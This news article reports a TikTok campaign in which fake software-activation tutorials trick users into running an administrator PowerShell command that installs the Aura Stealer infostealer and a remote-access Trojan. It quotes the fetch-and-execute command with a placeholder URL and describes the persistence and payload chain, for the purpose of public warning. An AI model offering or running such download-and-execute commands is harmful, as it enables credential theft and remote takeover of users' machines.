TikTokers falling for videos spreading fake software activation commands, hiding malware

Published: 18 October 2025
Last updated: 18 October 2025
cybercriminals on TikTok

Cybercriminals on TikTok are collecting thousands of likes for videos that instruct unaware users to download and run malware themselves. TikTokers run malicious PowerShell commands, believing they’re activating Windows or other software for free.

Xavier Mertens, a security consultant and blogger, has discovered a new campaign on TikTok. Cybercrooks have twisted the notorious ClickFix attack technique, which involves users installing malware themselves.

This time, instead of fake CAPTCHA puzzles, crooks create fake software activation guides and other tutorials on TikTok. They lure users into running PowerShell as administrators and entering a command to activate the software.

ADVERTISEMENT

“Attackers are everywhere! They try to abuse victims using new communication channels and social engineering techniques!” Mertens writes in the post on the Internet Storm Center of the SANS Technology Institute.

fake-tiktok

“The author pretends to provide you with an easy way to activate Photoshop for free.”

What's particularly dangerous is that the malicious command has been contracted to just 22 characters and doesn’t raise any immediate suspicion. It even includes keywords such as “Windows” or other related software packages in the URL part. Users are not required to launch any suspicious files or executables.

The malicious command looks like this: iex (irm maliciousURL/windows). It consists of two parts. The “irm” or “Invoke-RestMethod” command downloads malicious content from the provided URL and returns it as a string. The “iex” command takes that string and executes it immediately as a PowerShell script.

malicious-command-on-tiktok

This simple command could be used to do many malicious things, from malware and ransomware delivery, credential theft, creating backdoors and remote access, to downloading any malicious payloads, disabling security software, etc. It’s basically giving hackers remote access with administrator privileges.

It can even provide the promised functionality and activate the software to mask malicious activity and avoid suspicion.

ADVERTISEMENT
malicious-command-on-tiktok-successful

Mertens found at least three videos on TikTok promoting this novel malware delivery method, one of which had over one thousand likes, hundreds of shares, and bookmarks.

many-vendors-flag-payload-as-malicious

However, Cybernews found many more videos that promote similar scripts to activate Windows or other systems.

One video from a popular TikTok site has racked up nearly 400,000 views, tens of thousands of likes, and hundreds of comments. It promotes scripts from Massgrave, a notorious piracy group developing activation scripts for Microsoft products.

tiktoker-spreading-scripts

However, these scripts are illegal, and might also be dangerous, and casual users won't be able to identify which packages they will run on the systems. Some TikTok users complained that cryptocurrency mining software had been secretly installed on their systems through this method.

“Oh, don't do it! Never take advice if it leads to PowerShell,” one TikToker warned correctly.

What do the hackers launch in the background?

Mertens analyzed the code that the malicious PowerShell command fetches from the attacker-controlled server. It downloads the next stage and implements persistence through a scheduled task that executes it at logon time.

ADVERTISEMENT

It runs an executable named Updater.exe, which is Aura Stealer, a relatively new malware-as-a-service program with multiple subscription tiers, advertised on underground forums. It is capable of stealing credentials from all major browsers, 70 applications, browser extensions, including cryptocurrency wallets, and two-factor authentication tools.

“Notable features include seamless Chromium cookie harvesting without process termination, server-side App-Bound data decryption, and a built-in payload loader with custom morphing for detection evasion,” the description on Malpedia reads.

jurgita justinasv Izabelė Pukėnaitė vilius Ernestas Naprys Gintaras Radauskas
Don't miss our latest stories on Google News. Add us as your Preferred Source on Google
Follow us

However, attackers go even further and download an additional payload named source.exe, a Trojan that allows remote control.

“This one implements an interesting technique; it compiles some code on demand during its execution,” the researcher noted.

The recommendation is very simple and clear – do not run scripts you find on TikTok.

“Stay safe and don't trust such videos!” Mertens encourages.

Unlock more exclusive Cybernews content on YouTube.

ADVERTISEMENT
Share
Post
Share
Share
Share
More from Cybernews
Companies using Fable 5 beware: it’s collecting your data, and there are no exceptions
World’s leading mathematicians ridicule AI hype in high-IQ declaration
Democrats are far more worried than Republicans that AI will take jobs, new poll finds
Europe’s tech revolution feels like Soviet déjà vu
New York demands advertisers use “synthetic performer” label or else
The surprising way Elon Musk is powering your next holiday flight
ADVERTISEMENT